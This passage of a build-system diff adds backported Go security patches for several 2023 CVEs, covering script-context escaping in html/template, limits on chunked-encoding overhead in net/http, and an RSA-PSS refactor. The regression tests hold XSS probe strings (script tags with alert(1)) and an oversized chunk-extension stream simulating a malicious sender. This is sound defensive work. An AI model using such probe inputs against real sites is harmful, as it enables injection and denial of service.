30Upstream-Status: Backport from [https://github.com/golang/go/commit/023b542edf38e2a1f87fcefb9f75ff2f99401b4c]
31CVE: CVE-2023-39318
32Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
33---
34 src/html/template/context.go | 6 ++-
35 src/html/template/escape.go | 5 +-
36 src/html/template/escape_test.go | 10 ++++
37 src/html/template/state_string.go | 26 +++++-----
38 src/html/template/transition.go | 80 ++++++++++++++++++++-----------
39 5 files changed, 84 insertions(+), 43 deletions(-)
40
41diff --git a/src/html/template/context.go b/src/html/template/context.go
42index 0b65313..4eb7891 100644
43--- a/src/html/template/context.go
44+++ b/src/html/template/context.go
45@@ -124,6 +124,10 @@ const (
46 stateJSBlockCmt
47 // stateJSLineCmt occurs inside a JavaScript // line comment.
48 stateJSLineCmt
49+ // stateJSHTMLOpenCmt occurs inside a JavaScript <!-- HTML-like comment.
50+ stateJSHTMLOpenCmt
51+ // stateJSHTMLCloseCmt occurs inside a JavaScript --> HTML-like comment.
52+ stateJSHTMLCloseCmt
53 // stateCSS occurs inside a <style> element or style attribute.
54 stateCSS
55 // stateCSSDqStr occurs inside a CSS double quoted string.
56@@ -149,7 +153,7 @@ const (
57 // authors & maintainers, not for end-users or machines.
58 func isComment(s state) bool {
59 switch s {
60- case stateHTMLCmt, stateJSBlockCmt, stateJSLineCmt, stateCSSBlockCmt, stateCSSLineCmt:
61+ case stateHTMLCmt, stateJSBlockCmt, stateJSLineCmt, stateJSHTMLOpenCmt, stateJSHTMLCloseCmt, stateCSSBlockCmt, stateCSSLineCmt:
62 return true
63 }
64 return false
65diff --git a/src/html/template/escape.go b/src/html/template/escape.go
66index 435f912..ad2ec69 100644
67--- a/src/html/template/escape.go
68+++ b/src/html/template/escape.go
69@@ -698,9 +698,12 @@ func (e *escaper) escapeText(c context, n *parse.TextNode) context {
70 if c.state != c1.state && isComment(c1.state) && c1.delim == delimNone {
71 // Preserve the portion between written and the comment start.
72 cs := i1 - 2
73- if c1.state == stateHTMLCmt {
74+ if c1.state == stateHTMLCmt || c1.state == stateJSHTMLOpenCmt {
75 // "<!--" instead of "/*" or "//"
76 cs -= 2
77+ } else if c1.state == stateJSHTMLCloseCmt {
78+ // "-->" instead of "/*" or "//"
79+ cs -= 1
80 }
81 b.Write(s[written:cs])
82 written = i1
83diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
84index f550691..5f41e52 100644
85--- a/src/html/template/escape_test.go
86+++ b/src/html/template/escape_test.go
87@@ -503,6 +503,16 @@ func TestEscape(t *testing.T) {
88 "<script>var a/*b*///c\nd</script>",
89 "<script>var a \nd</script>",
90 },
91+ {
92+ "JS HTML-like comments",
93+ "<script>before <!-- beep\nbetween\nbefore-->boop\n</script>",
94+ "<script>before \nbetween\nbefore\n</script>",
95+ },
96+ {
97+ "JS hashbang comment",
98+ "<script>#! beep\n</script>",
99+ "<script>\n</script>",
100+ },
101 {
102 "CSS comments",
103 "<style>p// paragraph\n" +
104diff --git a/src/html/template/state_string.go b/src/html/template/state_string.go
105index 05104be..b5cfe70 100644
106--- a/src/html/template/state_string.go
107+++ b/src/html/template/state_string.go
108@@ -25,21 +25,23 @@ func _() {
109 _ = x[stateJSRegexp-14]
110 _ = x[stateJSBlockCmt-15]
111 _ = x[stateJSLineCmt-16]
112- _ = x[stateCSS-17]
113- _ = x[stateCSSDqStr-18]
114- _ = x[stateCSSSqStr-19]
115- _ = x[stateCSSDqURL-20]
116- _ = x[stateCSSSqURL-21]
117- _ = x[stateCSSURL-22]
118- _ = x[stateCSSBlockCmt-23]
119- _ = x[stateCSSLineCmt-24]
120- _ = x[stateError-25]
121- _ = x[stateDead-26]
122+ _ = x[stateJSHTMLOpenCmt-17]
123+ _ = x[stateJSHTMLCloseCmt-18]
124+ _ = x[stateCSS-19]
125+ _ = x[stateCSSDqStr-20]
126+ _ = x[stateCSSSqStr-21]
127+ _ = x[stateCSSDqURL-22]
128+ _ = x[stateCSSSqURL-23]
129+ _ = x[stateCSSURL-24]
130+ _ = x[stateCSSBlockCmt-25]
131+ _ = x[stateCSSLineCmt-26]
132+ _ = x[stateError-27]
133+ _ = x[stateDead-28]
134 }
135
136-const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSBqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateErrorstateDead"
137+const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSBqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateJSHTMLOpenCmtstateJSHTMLCloseCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateErrorstateDead"
138
139-var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 154, 167, 182, 196, 204, 217, 230, 243, 256, 267, 283, 298, 308, 317}
140+var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 154, 167, 182, 196, 214, 233, 241, 254, 267, 280, 293, 304, 320, 335, 345, 354}
141
142 func (i state) String() string {
143 if i >= state(len(_state_index)-1) {
144diff --git a/src/html/template/transition.go b/src/html/template/transition.go
145index 92eb351..12aa4c4 100644
146--- a/src/html/template/transition.go
147+++ b/src/html/template/transition.go
148@@ -14,32 +14,34 @@ import (
149 // the updated context and the number of bytes consumed from the front of the
150 // input.
151 var transitionFunc = [...]func(context, []byte) (context, int){
152- stateText: tText,
153- stateTag: tTag,
154- stateAttrName: tAttrName,
155- stateAfterName: tAfterName,
156- stateBeforeValue: tBeforeValue,
157- stateHTMLCmt: tHTMLCmt,
158- stateRCDATA: tSpecialTagEnd,
159- stateAttr: tAttr,
160- stateURL: tURL,
161- stateSrcset: tURL,
162- stateJS: tJS,
163- stateJSDqStr: tJSDelimited,
164- stateJSSqStr: tJSDelimited,
165- stateJSBqStr: tJSDelimited,
166- stateJSRegexp: tJSDelimited,
167- stateJSBlockCmt: tBlockCmt,
168- stateJSLineCmt: tLineCmt,
169- stateCSS: tCSS,
170- stateCSSDqStr: tCSSStr,
171- stateCSSSqStr: tCSSStr,
172- stateCSSDqURL: tCSSStr,
173- stateCSSSqURL: tCSSStr,
174- stateCSSURL: tCSSStr,
175- stateCSSBlockCmt: tBlockCmt,
176- stateCSSLineCmt: tLineCmt,
177- stateError: tError,
178+ stateText: tText,
179+ stateTag: tTag,
180+ stateAttrName: tAttrName,
181+ stateAfterName: tAfterName,
182+ stateBeforeValue: tBeforeValue,
183+ stateHTMLCmt: tHTMLCmt,
184+ stateRCDATA: tSpecialTagEnd,
185+ stateAttr: tAttr,
186+ stateURL: tURL,
187+ stateSrcset: tURL,
188+ stateJS: tJS,
189+ stateJSDqStr: tJSDelimited,
190+ stateJSSqStr: tJSDelimited,
191+ stateJSBqStr: tJSDelimited,
192+ stateJSRegexp: tJSDelimited,
193+ stateJSBlockCmt: tBlockCmt,
194+ stateJSLineCmt: tLineCmt,
195+ stateJSHTMLOpenCmt: tLineCmt,
196+ stateJSHTMLCloseCmt: tLineCmt,
197+ stateCSS: tCSS,
198+ stateCSSDqStr: tCSSStr,
199+ stateCSSSqStr: tCSSStr,
200+ stateCSSDqURL: tCSSStr,
201+ stateCSSSqURL: tCSSStr,
202+ stateCSSURL: tCSSStr,
203+ stateCSSBlockCmt: tBlockCmt,
204+ stateCSSLineCmt: tLineCmt,
205+ stateError: tError,
206 }
207
208 var commentStart = []byte("<!--")
209@@ -263,7 +265,7 @@ func tURL(c context, s []byte) (context, int) {
210
211 // tJS is the context transition function for the JS state.
212 func tJS(c context, s []byte) (context, int) {
213- i := bytes.IndexAny(s, "\"`'/")
214+ i := bytes.IndexAny(s, "\"`'/<-#")
215 if i == -1 {
216 // Entire input is non string, comment, regexp tokens.
217 c.jsCtx = nextJSCtx(s, c.jsCtx)
218@@ -293,6 +295,26 @@ func tJS(c context, s []byte) (context, int) {
219 err: errorf(ErrSlashAmbig, nil, 0, "'/' could start a division or regexp: %.32q", s[i:]),
220 }, len(s)
221 }
222+ // ECMAScript supports HTML style comments for legacy reasons, see Appendix
223+ // B.1.1 "HTML-like Comments". The handling of these comments is somewhat
224+ // confusing. Multi-line comments are not supported, i.e. anything on lines
225+ // between the opening and closing tokens is not considered a comment, but
226+ // anything following the opening or closing token, on the same line, is
227+ // ignored. As such we simply treat any line prefixed with "<!--" or "-->"
228+ // as if it were actually prefixed with "//" and move on.
229+ case '<':
230+ if i+3 < len(s) && bytes.Equal(commentStart, s[i:i+4]) {
231+ c.state, i = stateJSHTMLOpenCmt, i+3
232+ }
233+ case '-':
234+ if i+2 < len(s) && bytes.Equal(commentEnd, s[i:i+3]) {
235+ c.state, i = stateJSHTMLCloseCmt, i+2
236+ }
237+ // ECMAScript also supports "hashbang" comment lines, see Section 12.5.
238+ case '#':
239+ if i+1 < len(s) && s[i+1] == '!' {
240+ c.state, i = stateJSLineCmt, i+1
241+ }
242 default:
243 panic("unreachable")
244 }
245@@ -372,12 +394,12 @@ func tBlockCmt(c context, s []byte) (context, int) {
246 return c, i + 2
247 }
248
249-// tLineCmt is the context transition function for //comment states.
250+// tLineCmt is the context transition function for //comment states, and the JS HTML-like comment state.
251 func tLineCmt(c context, s []byte) (context, int) {
252 var lineTerminators string
253 var endState state
254 switch c.state {
255- case stateJSLineCmt:
256+ case stateJSLineCmt, stateJSHTMLOpenCmt, stateJSHTMLCloseCmt:
257 lineTerminators, endState = "\n\r\u2028\u2029", stateJS
258 case stateCSSLineCmt:
259 lineTerminators, endState = "\n\f\r", stateCSS
260--
2612.24.4
262
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch
new file mode 100644
index 0000000000..69106e3e05
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch
@@ -0,0 +1,230 @@
1From 2070531d2f53df88e312edace6c8dfc9686ab2f5 Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <bracewell@google.com>
3Date: Thu, 3 Aug 2023 12:28:28 -0700
4Subject: [PATCH] [release-branch.go1.20] html/template: properly handle
5 special tags within the script context
6
7The HTML specification has incredibly complex rules for how to handle
8"<!--", "<script", and "</script" when they appear within literals in
9the script context. Rather than attempting to apply these restrictions
10(which require a significantly more complex state machine) we apply
11the workaround suggested in section 4.12.1.3 of the HTML specification [1].
12
13More precisely, when "<!--", "<script", and "</script" appear within
14literals (strings and regular expressions, ignoring comments since we
15already elide their content) we replace the "<" with "\x3C". This avoids
16the unintuitive behavior that using these tags within literals can cause,
17by simply preventing the rendered content from triggering it. This may
18break some correct usages of these tags, but on balance is more likely
19to prevent XSS attacks where users are unknowingly either closing or not
20closing the script blocks where they think they are.
21
22Thanks to Takeshi Kaneko (GMO Cybersecurity by Ierae, Inc.) for
23reporting this issue.
24
25Fixes #62197
26Fixes #62397
27Fixes CVE-2023-39319
28
29[1] https://html.spec.whatwg.org/#restrictions-for-contents-of-script-elements
30
31Change-Id: Iab57b0532694827e3eddf57a7497ba1fab1746dc
32Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1976594
33Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
34Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
35Reviewed-by: Damien Neil <dneil@google.com>
36Run-TryBot: Roland Shoemaker <bracewell@google.com>
37Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2014621
38TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
39Reviewed-on: https://go-review.googlesource.com/c/go/+/526099
40TryBot-Result: Gopher Robot <gobot@golang.org>
41Run-TryBot: Cherry Mui <cherryyz@google.com>
42
43Upstream-Status: Backport from [https://github.com/golang/go/commit/2070531d2f53df88e312edace6c8dfc9686ab2f5]
44CVE: CVE-2023-39319
45Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
46---
47 src/html/template/context.go | 14 ++++++++++
48 src/html/template/escape.go | 26 ++++++++++++++++++
49 src/html/template/escape_test.go | 47 +++++++++++++++++++++++++++++++-
50 src/html/template/transition.go | 15 ++++++++++
51 4 files changed, 101 insertions(+), 1 deletion(-)
52
53diff --git a/src/html/template/context.go b/src/html/template/context.go
54index 4eb7891..feb6517 100644
55--- a/src/html/template/context.go
56+++ b/src/html/template/context.go
57@@ -168,6 +168,20 @@ func isInTag(s state) bool {
58 return false
59 }
60
61+// isInScriptLiteral returns true if s is one of the literal states within a
62+// <script> tag, and as such occurances of "<!--", "<script", and "</script"
63+// need to be treated specially.
64+func isInScriptLiteral(s state) bool {
65+ // Ignore the comment states (stateJSBlockCmt, stateJSLineCmt,
66+ // stateJSHTMLOpenCmt, stateJSHTMLCloseCmt) because their content is already
67+ // omitted from the output.
68+ switch s {
69+ case stateJSDqStr, stateJSSqStr, stateJSBqStr, stateJSRegexp:
70+ return true
71+ }
72+ return false
73+}
74+
75 // delim is the delimiter that will end the current HTML attribute.
76 type delim uint8
77
78diff --git a/src/html/template/escape.go b/src/html/template/escape.go
79index ad2ec69..de8cf6f 100644
80--- a/src/html/template/escape.go
81+++ b/src/html/template/escape.go
82@@ -10,6 +10,7 @@ import (
83 "html"
84 "internal/godebug"
85 "io"
86+ "regexp"
87 "text/template"
88 "text/template/parse"
89 )
90@@ -650,6 +651,26 @@ var delimEnds = [...]string{
91 delimSpaceOrTagEnd: " \t\n\f\r>",
92 }
93
94+var (
95+ // Per WHATWG HTML specification, section 4.12.1.3, there are extremely
96+ // complicated rules for how to handle the set of opening tags <!--,
97+ // <script, and </script when they appear in JS literals (i.e. strings,
98+ // regexs, and comments). The specification suggests a simple solution,
99+ // rather than implementing the arcane ABNF, which involves simply escaping
100+ // the opening bracket with \x3C. We use the below regex for this, since it
101+ // makes doing the case-insensitive find-replace much simpler.
102+ specialScriptTagRE = regexp.MustCompile("(?i)<(script|/script|!--)")
103+ specialScriptTagReplacement = []byte("\\x3C$1")
104+)
105+
106+func containsSpecialScriptTag(s []byte) bool {
107+ return specialScriptTagRE.Match(s)
108+}
109+
110+func escapeSpecialScriptTags(s []byte) []byte {
111+ return specialScriptTagRE.ReplaceAll(s, specialScriptTagReplacement)
112+}
113+
114 var doctypeBytes = []byte("<!DOCTYPE")
115
116 // escapeText escapes a text template node.
117@@ -708,6 +729,11 @@ func (e *escaper) escapeText(c context, n *parse.TextNode) context {
118 b.Write(s[written:cs])
119 written = i1
120 }
121+ if isInScriptLiteral(c.state) && containsSpecialScriptTag(s[i:i1]) {
122+ b.Write(s[written:i])
123+ b.Write(escapeSpecialScriptTags(s[i:i1]))
124+ written = i1
125+ }
126 if i == i1 && c.state == c1.state {
127 panic(fmt.Sprintf("infinite loop from %v to %v on %q..%q", c, c1, s[:i], s[i:]))
128 }
129diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
130index 5f41e52..0cacb20 100644
131--- a/src/html/template/escape_test.go
132+++ b/src/html/template/escape_test.go
133@@ -513,6 +513,21 @@ func TestEscape(t *testing.T) {
134 "<script>#! beep\n</script>",
135 "<script>\n</script>",
136 },
137+ {
138+ "Special tags in <script> string literals",
139+ `<script>var a = "asd < 123 <!-- 456 < fgh <script jkl < 789 </script"</script>`,
140+ `<script>var a = "asd < 123 \x3C!-- 456 < fgh \x3Cscript jkl < 789 \x3C/script"</script>`,
141+ },
142+ {
143+ "Special tags in <script> string literals (mixed case)",
144+ `<script>var a = "<!-- <ScripT </ScripT"</script>`,
145+ `<script>var a = "\x3C!-- \x3CScripT \x3C/ScripT"</script>`,
146+ },
147+ {
148+ "Special tags in <script> regex literals (mixed case)",
149+ `<script>var a = /<!-- <ScripT </ScripT/</script>`,
150+ `<script>var a = /\x3C!-- \x3CScripT \x3C/ScripT/</script>`,
151+ },
152 {
153 "CSS comments",
154 "<style>p// paragraph\n" +
155@@ -1501,8 +1516,38 @@ func TestEscapeText(t *testing.T) {
156 context{state: stateJS, element: elementScript},
157 },
158 {
159+ // <script and </script tags are escaped, so </script> should not
160+ // cause us to exit the JS state.
161 `<script>document.write("<script>alert(1)</script>");`,
162- context{state: stateText},
163+ context{state: stateJS, element: elementScript},
164+ },
165+ {
166+ `<script>document.write("<script>`,
167+ context{state: stateJSDqStr, element: elementScript},
168+ },
169+ {
170+ `<script>document.write("<script>alert(1)</script>`,
171+ context{state: stateJSDqStr, element: elementScript},
172+ },
173+ {
174+ `<script>document.write("<script>alert(1)<!--`,
175+ context{state: stateJSDqStr, element: elementScript},
176+ },
177+ {
178+ `<script>document.write("<script>alert(1)</Script>");`,
179+ context{state: stateJS, element: elementScript},
180+ },
181+ {
182+ `<script>document.write("<!--");`,
183+ context{state: stateJS, element: elementScript},
184+ },
185+ {
186+ `<script>let a = /</script`,
187+ context{state: stateJSRegexp, element: elementScript},
188+ },
189+ {
190+ `<script>let a = /</script/`,
191+ context{state: stateJS, element: elementScript, jsCtx: jsCtxDivOp},
192 },
193 {
194 `<script type="text/template">`,
195diff --git a/src/html/template/transition.go b/src/html/template/transition.go
196index 12aa4c4..3d2a37c 100644
197--- a/src/html/template/transition.go
198+++ b/src/html/template/transition.go
199@@ -214,6 +214,11 @@ var (
200 // element states.
201 func tSpecialTagEnd(c context, s []byte) (context, int) {
202 if c.element != elementNone {
203+ // script end tags ("</script") within script literals are ignored, so that
204+ // we can properly escape them.
205+ if c.element == elementScript && (isInScriptLiteral(c.state) || isComment(c.state)) {
206+ return c, len(s)
207+ }
208 if i := indexTagEnd(s, specialTagEndMarkers[c.element]); i != -1 {
209 return context{}, i
210 }
211@@ -353,6 +358,16 @@ func tJSDelimited(c context, s []byte) (context, int) {
212 inCharset = true
213 case ']':
214 inCharset = false
215+ case '/':
216+ // If "</script" appears in a regex literal, the '/' should not
217+ // close the regex literal, and it will later be escaped to
218+ // "\x3C/script" in escapeText.
219+ if i > 0 && i+7 <= len(s) && bytes.Compare(bytes.ToLower(s[i-1:i+7]), []byte("</script")) == 0 {
220+ i++
221+ } else if !inCharset {
222+ c.state, c.jsCtx = stateJS, jsCtxDivOp
223+ return c, i + 1
224+ }
225 default:
226 // end delimiter
227 if !inCharset {
228--
2292.24.4
230
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-39326.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-39326.patch
new file mode 100644
index 0000000000..998af361e8
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-39326.patch
@@ -0,0 +1,181 @@
1From 6446af942e2e2b161c4ec1b60d9703a2b55dc4dd Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Tue, 7 Nov 2023 10:47:56 -0800
4Subject: [PATCH] [release-branch.go1.20] net/http: limit chunked data overhead
5
6The chunked transfer encoding adds some overhead to
7the content transferred. When writing one byte per
8chunk, for example, there are five bytes of overhead
9per byte of data transferred: "1\r\nX\r\n" to send "X".
10
11Chunks may include "chunk extensions",
12which we skip over and do not use.
13For example: "1;chunk extension here\r\nX\r\n".
14
15A malicious sender can use chunk extensions to add
16about 4k of overhead per byte of data.
17(The maximum chunk header line size we will accept.)
18
19Track the amount of overhead read in chunked data,
20and produce an error if it seems excessive.
21
22Updates #64433
23Fixes #64434
24Fixes CVE-2023-39326
25
26Change-Id: I40f8d70eb6f9575fb43f506eb19132ccedafcf39
27Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2076135
28Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
29Reviewed-by: Roland Shoemaker <bracewell@google.com>
30(cherry picked from commit 3473ae72ee66c60744665a24b2fde143e8964d4f)
31Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2095407
32Run-TryBot: Roland Shoemaker <bracewell@google.com>
33TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
34Reviewed-by: Damien Neil <dneil@google.com>
35Reviewed-on: https://go-review.googlesource.com/c/go/+/547355
36Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
37LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
38
39Upstream-Status: Backport [https://github.com/golang/go/commit/6446af942e2e2b161c4ec1b60d9703a2b55dc4dd]
40CVE: CVE-2023-39326
41Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
42---
43 src/net/http/internal/chunked.go | 36 +++++++++++++---
44 src/net/http/internal/chunked_test.go | 59 +++++++++++++++++++++++++++
45 2 files changed, 89 insertions(+), 6 deletions(-)
46
47diff --git a/src/net/http/internal/chunked.go b/src/net/http/internal/chunked.go
48index f06e572..ddbaacb 100644
49--- a/src/net/http/internal/chunked.go
50+++ b/src/net/http/internal/chunked.go
51@@ -39,7 +39,8 @@ type chunkedReader struct {
52 n uint64 // unread bytes in chunk
53 err error
54 buf [2]byte
55- checkEnd bool // whether need to check for \r\n chunk footer
56+ checkEnd bool // whether need to check for \r\n chunk footer
57+ excess int64 // "excessive" chunk overhead, for malicious sender detection
58 }
59
60 func (cr *chunkedReader) beginChunk() {
61@@ -49,10 +50,38 @@ func (cr *chunkedReader) beginChunk() {
62 if cr.err != nil {
63 return
64 }
65+ cr.excess += int64(len(line)) + 2 // header, plus \r\n after the chunk data
66+ line = trimTrailingWhitespace(line)
67+ line, cr.err = removeChunkExtension(line)
68+ if cr.err != nil {
69+ return
70+ }
71 cr.n, cr.err = parseHexUint(line)
72 if cr.err != nil {
73 return
74 }
75+ // A sender who sends one byte per chunk will send 5 bytes of overhead
76+ // for every byte of data. ("1\r\nX\r\n" to send "X".)
77+ // We want to allow this, since streaming a byte at a time can be legitimate.
78+ //
79+ // A sender can use chunk extensions to add arbitrary amounts of additional
80+ // data per byte read. ("1;very long extension\r\nX\r\n" to send "X".)
81+ // We don't want to disallow extensions (although we discard them),
82+ // but we also don't want to allow a sender to reduce the signal/noise ratio
83+ // arbitrarily.
84+ //
85+ // We track the amount of excess overhead read,
86+ // and produce an error if it grows too large.
87+ //
88+ // Currently, we say that we're willing to accept 16 bytes of overhead per chunk,
89+ // plus twice the amount of real data in the chunk.
90+ cr.excess -= 16 + (2 * int64(cr.n))
91+ if cr.excess < 0 {
92+ cr.excess = 0
93+ }
94+ if cr.excess > 16*1024 {
95+ cr.err = errors.New("chunked encoding contains too much non-data")
96+ }
97 if cr.n == 0 {
98 cr.err = io.EOF
99 }
100@@ -133,11 +162,6 @@ func readChunkLine(b *bufio.Reader) ([]byte, error) {
101 if len(p) >= maxLineLength {
102 return nil, ErrLineTooLong
103 }
104- p = trimTrailingWhitespace(p)
105- p, err = removeChunkExtension(p)
106- if err != nil {
107- return nil, err
108- }
109 return p, nil
110 }
111
112diff --git a/src/net/http/internal/chunked_test.go b/src/net/http/internal/chunked_test.go
113index d067165..b20747d 100644
114--- a/src/net/http/internal/chunked_test.go
115+++ b/src/net/http/internal/chunked_test.go
116@@ -212,3 +212,62 @@ func TestChunkReadPartial(t *testing.T) {
117 }
118
119 }
120+
121+func TestChunkReaderTooMuchOverhead(t *testing.T) {
122+ // If the sender is sending 100x as many chunk header bytes as chunk data,
123+ // we should reject the stream at some point.
124+ chunk := []byte("1;")
125+ for i := 0; i < 100; i++ {
126+ chunk = append(chunk, 'a') // chunk extension
127+ }
128+ chunk = append(chunk, "\r\nX\r\n"...)
129+ const bodylen = 1 << 20
130+ r := NewChunkedReader(&funcReader{f: func(i int) ([]byte, error) {
131+ if i < bodylen {
132+ return chunk, nil
133+ }
134+ return []byte("0\r\n"), nil
135+ }})
136+ _, err := io.ReadAll(r)
137+ if err == nil {
138+ t.Fatalf("successfully read body with excessive overhead; want error")
139+ }
140+}
141+
142+func TestChunkReaderByteAtATime(t *testing.T) {
143+ // Sending one byte per chunk should not trip the excess-overhead detection.
144+ const bodylen = 1 << 20
145+ r := NewChunkedReader(&funcReader{f: func(i int) ([]byte, error) {
146+ if i < bodylen {
147+ return []byte("1\r\nX\r\n"), nil
148+ }
149+ return []byte("0\r\n"), nil
150+ }})
151+ got, err := io.ReadAll(r)
152+ if err != nil {
153+ t.Errorf("unexpected error: %v", err)
154+ }
155+ if len(got) != bodylen {
156+ t.Errorf("read %v bytes, want %v", len(got), bodylen)
157+ }
158+}
159+
160+type funcReader struct {
161+ f func(iteration int) ([]byte, error)
162+ i int
163+ b []byte
164+ err error
165+}
166+
167+func (r *funcReader) Read(p []byte) (n int, err error) {
168+ if len(r.b) == 0 && r.err == nil {
169+ r.b, r.err = r.f(r.i)
170+ r.i++
171+ }
172+ n = copy(p, r.b)
173+ r.b = r.b[n:]
174+ if len(r.b) > 0 {
175+ return n, nil
176+ }
177+ return n, r.err
178+}
179--
1802.25.1
181
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre1.patch
new file mode 100644
index 0000000000..4d65180253
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre1.patch
@@ -0,0 +1,393 @@
1From 9baafabac9a84813a336f068862207d2bb06d255 Mon Sep 17 00:00:00 2001
2From: Filippo Valsorda <filippo@golang.org>
3Date: Wed, 1 Apr 2020 17:25:40 -0400
4Subject: [PATCH] crypto/rsa: refactor RSA-PSS signing and verification
5
6Cleaned up for readability and consistency.
7
8There is one tiny behavioral change: when PSSSaltLengthEqualsHash is
9used and both hash and opts.Hash were set, hash.Size() was used for the
10salt length instead of opts.Hash.Size(). That's clearly wrong because
11opts.Hash is documented to override hash.
12
13Change-Id: I3e25dad933961eac827c6d2e3bbfe45fc5a6fb0e
14Reviewed-on: https://go-review.googlesource.com/c/go/+/226937
15Run-TryBot: Filippo Valsorda <filippo@golang.org>
16TryBot-Result: Gobot Gobot <gobot@golang.org>
17Reviewed-by: Katie Hockman <katie@golang.org>
18
19Upstream-Status: Backport [https://github.com/golang/go/commit/9baafabac9a84813a336f068862207d2bb06d255]
20CVE: CVE-2023-45287 #Dependency Patch1
21Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
22---
23 src/crypto/rsa/pss.go | 173 ++++++++++++++++++++++--------------------
24 src/crypto/rsa/rsa.go | 9 ++-
25 2 files changed, 96 insertions(+), 86 deletions(-)
26
27diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
28index 3ff0c2f4d0076..f9844d87329a8 100644
29--- a/src/crypto/rsa/pss.go
30+++ b/src/crypto/rsa/pss.go
31@@ -4,9 +4,7 @@
32
33 package rsa
34
35-// This file implements the PSS signature scheme [1].
36-//
37-// [1] https://www.emc.com/collateral/white-papers/h11300-pkcs-1v2-2-rsa-cryptography-standard-wp.pdf
38+// This file implements the RSASSA-PSS signature scheme according to RFC 8017.
39
40 import (
41 "bytes"
42@@ -17,8 +15,22 @@ import (
43 "math/big"
44 )
45
46+// Per RFC 8017, Section 9.1
47+//
48+// EM = MGF1 xor DB || H( 8*0x00 || mHash || salt ) || 0xbc
49+//
50+// where
51+//
52+// DB = PS || 0x01 || salt
53+//
54+// and PS can be empty so
55+//
56+// emLen = dbLen + hLen + 1 = psLen + sLen + hLen + 2
57+//
58+
59 func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byte, error) {
60- // See [1], section 9.1.1
61+ // See RFC 8017, Section 9.1.1.
62+
63 hLen := hash.Size()
64 sLen := len(salt)
65 emLen := (emBits + 7) / 8
66@@ -30,7 +42,7 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
67 // 2. Let mHash = Hash(M), an octet string of length hLen.
68
69 if len(mHash) != hLen {
70- return nil, errors.New("crypto/rsa: input must be hashed message")
71+ return nil, errors.New("crypto/rsa: input must be hashed with given hash")
72 }
73
74 // 3. If emLen < hLen + sLen + 2, output "encoding error" and stop.
75@@ -40,8 +52,9 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
76 }
77
78 em := make([]byte, emLen)
79- db := em[:emLen-sLen-hLen-2+1+sLen]
80- h := em[emLen-sLen-hLen-2+1+sLen : emLen-1]
81+ psLen := emLen - sLen - hLen - 2
82+ db := em[:psLen+1+sLen]
83+ h := em[psLen+1+sLen : emLen-1]
84
85 // 4. Generate a random octet string salt of length sLen; if sLen = 0,
86 // then salt is the empty string.
87@@ -69,8 +82,8 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
88 // 8. Let DB = PS || 0x01 || salt; DB is an octet string of length
89 // emLen - hLen - 1.
90
91- db[emLen-sLen-hLen-2] = 0x01
92- copy(db[emLen-sLen-hLen-1:], salt)
93+ db[psLen] = 0x01
94+ copy(db[psLen+1:], salt)
95
96 // 9. Let dbMask = MGF(H, emLen - hLen - 1).
97 //
98@@ -81,47 +94,57 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
99 // 11. Set the leftmost 8 * emLen - emBits bits of the leftmost octet in
100 // maskedDB to zero.
101
102- db[0] &= (0xFF >> uint(8*emLen-emBits))
103+ db[0] &= 0xff >> (8*emLen - emBits)
104
105 // 12. Let EM = maskedDB || H || 0xbc.
106- em[emLen-1] = 0xBC
107+ em[emLen-1] = 0xbc
108
109 // 13. Output EM.
110 return em, nil
111 }
112
113 func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
